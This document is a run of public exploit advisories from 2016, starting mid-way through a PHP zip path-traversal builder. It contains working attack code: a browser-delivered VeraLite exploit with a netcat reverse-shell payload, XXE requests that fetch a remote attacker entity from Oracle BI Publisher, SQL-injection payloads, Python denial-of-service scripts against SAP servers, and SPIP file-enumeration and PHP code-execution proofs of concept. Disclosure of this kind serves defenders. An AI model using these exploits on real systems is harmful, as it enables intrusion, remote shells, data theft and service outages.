if(strtolower($argv[3])!="y"){
if(!empty($argv[3])){
$exploit_file=$argv[3];
}
if(!empty($argv[4])){
$cmd=$argv[4];
}else{
echo "Usage: enter a payload for file $exploit_file wrapped in double
quotes";
exit();
}
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\",
$depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo "================ hyp3rlinx ===================";
?>
Disclosure Timeline:
=======================================
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
=====================
CVSS VERSION 3.0 RISK
5.7
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
# Exploit Title: MiCasa VeraLite Remote Code Execution
# Date: 10-20-2016
# Software Link: http://getvera.com/controllers/veralite/
# Exploit Author: Jacob Baines
# Contact: https://twitter.com/Junior_Baines
# CVE: CVE-2013-4863 & CVE-2016-6255
# Platform: Hardware
1. Description
A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.
2. Proof of Concept
<!--
@about
This file, when loaded in a browser, will attempt to get a reverse shell
on a VeraLite device on the client's network. This is achieved with the
following steps:
1. Acquire the client's internal IP address using webrtc. We then assume the
client is operating on a \24 network.
2. POST :49451/z3n.html to every address on the subnet. This leverages two
things we know to be true about VeraLite:
- there should be a UPnP HTTP server on 49451
- VeraLite uses a libupnp vulnerable to CVE-2016-6255.
3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
successfully created the file via CVE-2016-6255
4. z3n.html will allow us to bypass same origin policy and it will make a
POST request that executes RunLau. This also leverages information we
know to be true about Veralite:
- the control URL for HomeAutomationGateway is /upnp/control/hag
- no auth required
5. Our RunLua code executes a reverse shell to 192.168.217:1270.
@note
This code doesn't run fast in Firefox. This appears to largely be a performance
issue associated with attaching a lot of iframes to a page. Give the shell
popping a couple of minutes. In Chrome, it runs pretty fast but might
exhaust socket usage.
@citations
- WebRTC IP leak: https://github.com/diafygi/webrtc-ips
- Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
- CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script>
/**
* POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
* libupnp then the page will be written. Once the request has
* completed, we attempt to load it in an iframe in order to bypass
* same origin policy. If the page is loaded into the iframe then
* it will make a soap action request with the action RunLua. The
* Lua code will execute a reverse shell.
* @param ip the ip address to request to
* @param frame_id the id of the iframe to create
*/
function create_page(ip, frame_id)
{
payload = "<!DOCTYPE html>\n" +
"<html>\n" +
"<head>\n" +
"<title>Try To See It Once My Way</title>\n" +
"<script>\n" +
"function exec_lua() {\n" +
"soap_request = \"<s:Envelope s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\" xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\";\n" +
"soap_request += \"<s:Body>\";\n" +
"soap_request += \"<u:RunLua xmlns:u=\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\\\">\";\n" +
"soap_request += \"<Code>os.execute("/bin/sh -c '(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&'")</Code>\";\n" +
"soap_request += \"</u:RunLua>\";\n" +
"soap_request += \"</s:Body>\";\n" +
"soap_request += \"</s:Envelope>\";\n" +
"xhttp = new XMLHttpRequest();\n" +
"xhttp.open(\"POST\", \"upnp/control/hag\", true);\n" +
"xhttp.setRequestHeader(\"MIME-Version\", \"1.0\");\n" +
"xhttp.setRequestHeader(\"Content-type\", \"text/xml;charset=\\\"utf-8\\\"\");\n" +
"xhttp.setRequestHeader(\"Soapaction\", \"\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\\\"\");\n" +
"xhttp.send(soap_request);\n" +
"}\n" +
"</scr\ipt>\n" +
"</head>\n" +
"<body onload=\"exec_lua()\">\n" +
"Zen?\n" +
"</body>\n" +
"</html>";
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "http://" + ip + ":49451/z3n.html", true);
xhttp.timeout = 1000;
xhttp.onreadystatechange = function()
{
if (xhttp.readyState == XMLHttpRequest.DONE)
{
new_iframe = document.createElement('iframe');
new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
new_iframe.setAttribute("id", frame_id);
new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
document.body.appendChild(new_iframe);
}
};
xhttp.send(payload);
}
/**
* This function abuses the webrtc internal IP leak. This function
* will find the the upper three bytes of network address and simply
* assume that the client is on a \24 network.
*
* Once we have an ip range, we will attempt to create a page on a
* vulnerable libupnp server via create_page().
*/
function spray_and_pray()
{
RTCPeerConnection = window.RTCPeerConnection ||
window.mozRTCPeerConnection ||
window.webkitRTCPeerConnection;
peerConn = new RTCPeerConnection({iceServers:[]});
noop = function() { };
peerConn.createDataChannel("");
peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
peerConn.onicecandidate = function(ice)
{
if (!ice || !ice.candidate || !ice.candidate.candidate)
{
return;
}
clientNetwork = /([0-9]{1,3}(\.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
peerConn.onicecandidate = noop;
if (clientNetwork && clientNetwork.length > 0)
{
for (i = 0; i < 255; i++)
{
create_page(clientNetwork + '.' + i, "page"+i);
}
}
};
}
</script>
</head>
<body onload="spray_and_pray()">
Everything zen.
</body>
</html>
3. Solution:
No solution exists
# Exploit Title: SQL Injection in Classifieds Rental Script
# Date: 19 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: www.i-netsolution.com
*----------------------------------------------------------------------------------------------------------------------*
# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/viewproducts.php?catid=PoC%27
# Exploit (using Sqlmap)
---
Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: catid=-1285' OR 8060=8060#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#
---
# Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication
# Date: 20\10\2016
# Exploit Author: Jakub Palaczynski
# CVE : CVE-2016-3473
# Vendor Homepage: https://www.oracle.com/
# Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0
# Info: Previous versions may also be vulnerable.
# Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login"
1. Vulnerable SOAP Action: replyToXML
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXML>
</soapenv:Body>
</soapenv:Envelope>
------------------------------------------------
2. Vulnerable SOAP Action: replyToXMLWithContext
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXMLWithContext
Host: vulnerablehost
Content-Length: 646
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXMLWithContext soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXMLWithContext>
</soapenv:Body>
</soapenv:Envelope>
'''
Application: SAP NetWeaver KERNEL
Versions Affected: SAP NetWeaver KERNEL 7.0-7.5
Vendor URL: http://SAP.com
Bugs: Denial of Service
Sent: 09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
Reference: SAP Security Note 2295238
Author: Dmitry Yudin (ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-030] SAP NetWeaver – buffer overflow vulnerability
Advisory ID: [ERPSCAN-16-030]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/
Date published: 12.10.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: Denial of Service
Impact: DoS
Remotely Exploitable: yes
Locally Exploitable: yes
CVSS Information
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)
C : Impact to Confidentiality None (N)
I : Impact to Integrity Low (L)
A : Impact to Availability Low (L)
3. VULNERABILITY DESCRIPTION
This vulnerability allows an attacker to send a special request to the
SAPSTARTSRV process port and conduct stack buffer overflow (recursion)
on the SAP server.
4. VULNERABLE PACKAGES
SAP KERNEL 7.21 32-BIT 625
SAP KERNEL 7.21 32-BIT UNICODE 625
SAP KERNEL 7.21 64-BIT 625
SAP KERNEL 7.21 64-BIT UNICODE 625
SAP KERNEL 7.21 EXT 32-BIT 625
SAP KERNEL 7.21 EXT 32-BIT UC 625
SAP KERNEL 7.21 EXT 64-BIT 625
SAP KERNEL 7.21 EXT 64-BIT UC 625
SAP KERNEL 7.22 64-BIT 113
SAP KERNEL 7.22 64-BIT UNICODE 113
SAP KERNEL 7.22 EXT 64-BIT 113
SAP KERNEL 7.22 EXT 64-BIT UC 113
SAP KERNEL 7.42 64-BIT 412
SAP KERNEL 7.42 64-BIT UNICODE 412
SAP KERNEL 7.45 64-BIT 113
SAP KERNEL 7.45 64-BIT UNICODE 113
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2295238
6. AUTHOR
Dmitry Yudin (ERPScan)
7. TECHNICAL DESCRIPTION
7.1. Proof of Concept
'''
import socket
PoC = """<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session
xlmns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
> """ + "<a>" * 100000 + "</a>" * 100000 + """ </sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:WW xmlns:ns1="urn:SAPControl">
<b></b>
<e><e>
</ns1:WW>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
for i in range(1,5):
sock = socket.socket()
sock.connect(("SAP_IP", SAP_PORT))
sock.send(PoC)
'''
Windbg exceptions
sapstartsrv!soap_getutf8+0xa:
00000001`4009cd2a e891f9ffff call sapstartsrv!soap_get
(00000001`4009c6c0)
rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0
rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0
rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0
r8=0000000134936c69 r9=0000000000000000 r10=0000000000000000
r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f
r14=00000001409f8ba0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
8. REPORT TIMELINE
Sent: 09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/
10. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
11. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
'''
'''
Application: SAP Adaptive Server Enterprise
Versions Affected: SAP Adaptive Server Enterprise 16
Vendor URL: http://SAP.com
Bugs: Denial of Service
Sent: 01.02.2016
Reported: 02.02.2016
Vendor response: 02.02.2016
Date of Public Advisory: 12.07.2016
Reference: SAP Security Note 2330839
Author: Vahagn Vardanyan(ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-028] SAP Adaptive Server Enterprise – DoS vulnerability
Advisory ID: [ERPSCAN-16-028]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-028-sap-adaptive-server-enterprise-null-pointer-exception/
Date published: 12.17.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: Denial of Service
Impact: DoS
Remotely Exploitable: yes
Locally Exploitable: yes
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)
C : Impact to Confidentiality None (N)
I : Impact to Integrity None (N)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
Anonymous attacker can send a special request to the SAP Adaptive
Server Enterprise and crash the server.
4. VULNERABLE PACKAGES
SAP Open Server 16.0 SP01, SP02
SAP ASE 16.0 SP01, SP02
SAP Replication Server SP207, SP209, SP210, SP3XX
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2330839
6. AUTHOR
Vahagn Vardanyan (ERPScan)
7. TECHNICAL DESCRIPTION
Proof of Concept
Sending special request to the SAP Adaptive Server Enterprise 16
(backup server) can get crash the server.
PoC
'''
import socket
PoC = "\xe2\xf3\x00\x9d\x80\x8e\xf3\xa0" \
"\x80\xb4\x00\x81\xb0\x00\x00\x93" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x31\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x34\x31\x30\x35\x37\x32" \
"\x37\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00"
s = socket.socket()
s.settimeout(1)
s.connect((SERVER_IP, SERVER_PORT))
s.send(PoC)
print(PoC)
s.close()
'''
0:019> r
rax=0000000000000000 rbx=000000000097c000 rcx=0000000000000000
rdx=00000000010bf810 rsi=0000000000970a30 rdi=0000000000904cb0
rip=00000000004027b4 rsp=00000000010bf7f0 rbp=0000000000000000
r8=0000000000904c90 r9=0000000000904ca0 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
libsybcomn64!comn_symkey_set_iv+0x34:
00000000`004027b4 488b4820 mov rcx,qword ptr [rax+20h]
ds:00000000`00000020=????????????????
8. REPORT TIMELINE
Sent: 01.02.2016
Reported: 02.02.2016
Vendor response: 02.02.2016
Date of Public Advisory: 12.07.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-028-sap-adaptive-server-enterprise-null-pointer-exception/
10. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
11. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
'''
## SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal (CVE-2016-7982)
### Product Description
SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.
### Vulnerability Description
The `valider_xml` file can be used to enumerate files on the system.
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-538
**CVSS Base Score**: 4.9 (Medium)
**CVE-ID**: CVE-2016-7982
### Proof of Concept
Enumerating `.ini` files inside `/etc` (SPIP 3.1.1) :
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=/etc&ext=ini&recur=2
Bypassing SPIP 3.1.2 protection using PHP Wrappers :
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///etc&ext=ini&recur=2
### Vulnerable code
if (is_dir($url)) {
$dir = (substr($url, -1, 1) === '/') ? $url : "$url/";
$ext = !preg_match('/^[.*\w]+$/', $req_ext) ? 'php' : $req_ext;
$files = preg_files($dir, "$ext$", $limit, $rec);
if (!$files and $ext !== 'html') {
$files = preg_files($dir, 'html$', $limit, $rec);
if ($files) {
$ext = 'html';
}
}
if ($files) {
$res = valider_dir($files, $ext, $url);
list($err, $res) = valider_resultats($res, $ext === 'html');
File names are stored in `$res` and displayed by `echo` on line 146 :
echo "<h1>", $titre, '<br>', $bandeau, '</h1>',
"<div style='text-align: center'>", $onfocus, "</div>",
$res,
fin_page();
### Timeline (dd/mm/yyyy)
* 15/09/2016 : Initial discovery
* 26/09/2016 : Contact with SPIP Team
* 27/09/2016 : Answer from SPIP Team, sent advisory details
* 27/09/2016 : Incorrect fixes for Path Traversal
* 27/09/2016 : New proof of concept for bypassing Path Traversal sent.
* 27/09/2016 : Bad fix for Path Traversal (23185)
* 28/09/2016 : New proof of concept for bypassing fixes for Path Traversal on Windows systems.
* 28/09/2016 : Fixes issued Path Traversal (23200)
* 30/09/2016 : SPIP 3.1.3 Released
### Fixes
* https://core.spip.net/projects/spip/repository/revisions/23207
* https://core.spip.net/projects/spip/repository/revisions/23208
* https://core.spip.net/projects/spip/repository/revisions/23206
* https://core.spip.net/projects/spip/repository/revisions/23202
* https://core.spip.net/projects/spip/repository/revisions/23201
* https://core.spip.net/projects/spip/repository/revisions/23200
* https://core.spip.net/projects/spip/repository/revisions/23191
* https://core.spip.net/projects/spip/repository/revisions/23190
* https://core.spip.net/projects/spip/repository/revisions/23193
* https://core.spip.net/projects/spip/repository/revisions/23188
* https://core.spip.net/projects/spip/repository/revisions/23187
* https://core.spip.net/projects/spip/repository/revisions/23185
* https://core.spip.net/projects/spip/repository/revisions/23182
* https://core.spip.net/projects/spip/repository/revisions/23184
### Affected versions
* Version <= 3.1.2
### Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
## SPIP 3.1.2 Exec Code Cross-Site Request Forgery (CVE-2016-7980)
### Product Description
SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.
### Vulnerability Description
The vulnerable request to `valider_xml` (see: *SPIP 3.1.2 Template Compiler/Composer PHP Code Execution - CVE-2016-7998*) is vulnerable to Cross-Site Request Forgery, allowing the execution of the CVE-2016-7998 attack by tricking an administrator to open the malicious link.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-352
**CVSS Base Score**: 8.3 (High)
**CVE-ID**: CVE-2016-7980
### Proof of Concept
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=/tmp/directory&ext=html
### Timeline (dd/mm/yyyy)
* 15/09/2016 : Initial discovery
* 26/09/2016 : Contact with SPIP Team
* 27/09/2016 : Answer from SPIP Team, sent advisory details
* 28/09/2016 : Fixes issued for CSRF
* 30/09/2016 : SPIP 3.1.3 Released
### Fixes
* https://core.spip.net/projects/spip/repository/revisions/23200
* https://core.spip.net/projects/spip/repository/revisions/23201
* https://core.spip.net/projects/spip/repository/revisions/23202
### Affected versions
* Version <= 3.1.2
### Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
## SPIP 3.1.2 Template Compiler/Composer PHP Code Execution (CVE-2016-7998)
### Product Description
SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.
### Vulnerability Description
The SPIP template composer/compiler does not correctly handle SPIP "INCLUDE/INCLURE" Tags, allowing PHP code execution by an authenticated user.
This vulnerability can be exploited using the CSRF or the XSS vulnerability also found in this advisory.
**Access Vector**: remote
**Security Risk**: critical
**Vulnerability**: CWE-94
**CVSS Base Score**: 9.1 (Critical)
**CVE-ID**: CVE-2016-7998
### Proof of Concept
Store a `.html` file in a random directory with the following content :
<INCLURE(xxx"\)\);}system\("touch /tmp/exploited"\);/*)>
Then you can access to the following URL, with the `var_url` paramater pointing to the path corresponding to your uploaded file:
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///tmp/directory&ext=html
The PHP code `system("touch /tmp/exploited");` will be executed after 2 requests.
This happens because the template file is included (if already compiled) by `ecrire/public/composer.php`, line 60 :
if (!squelette_obsolete($phpfile, $source)) {
include_once $phpfile;
and because we can "exit" the function generated by the template compiler (improper sanitization when generating argumenter_squelette):
function html_xxxx($Cache, $Pile, $doublons = array(), $Numrows = array(), $SP = 0) {
if (isset($Pile[0]["doublons"]) AND is_array($Pile[0]["doublons"]))
$doublons = nettoyer_env_doublons($Pile[0]["doublons"]);
$connect = '';
$page = (
'<'.'?php echo recuperer_fond( ' . argumenter_squelette("xxx"));}system("touch /tmp/exploited");/*") . ', array(\'lang\' => ' . argumenter_squelette($GLOBALS["spip_lang"]) . '), array("compil"=>array(\'/tmp/exploit.html\',\'html_xxxx\',\'\',1,$GLOBALS[\'spip_lang\'])), _request("connect"));
?'.'>
');
return analyse_resultat_skel('html_xxxx', $Cache, $page, '/tmp/exploit.html');
}
Therefore, the vulnerability leads to arbitrary PHP code execution.
### Vulnerable code
The vulnerable code is located in the `argumenter_inclure` function (`ecrire/public/compiler.php`), line 123.
if ($var !== 1) {
$val = ($echap ? "\'$var\' => ' . argumenter_squelette(" : "'$var' => ")
. $val . ($echap ? ") . '" : " ");
}
### Timeline (dd/mm/yyyy)
* 15/09/2016 : Initial discovery
* 26/09/2016 : Contact with SPIP Team
* 27/09/2016 : Answer from SPIP Team, sent advisory details
* 27/09/2016 : Fixes issued for PHP Code Execution
* 30/09/2016 : SPIP 3.1.3 Released
### Fixes
* https://core.spip.net/projects/spip/repository/revisions/23186
* https://core.spip.net/projects/spip/repository/revisions/23189
* https://core.spip.net/projects/spip/repository/revisions/23192
### Affected versions
* Version <= 3.1.2
### Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
=====================================================
# Event Calendar PHP 1.5 - SQL Injection
=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/eventcalendar/admin.php?act=options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_language&cal_id=[payload]
Vulnerable parameter : cal_id
Mehod : GET
A simple inject :
Payload : '+order+by+20--+
http://localhost/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+
In response can see result :
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by
20-- '. Error: Unknown column '20' in 'order clause'
Result of payload: Error: Unknown column '20' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
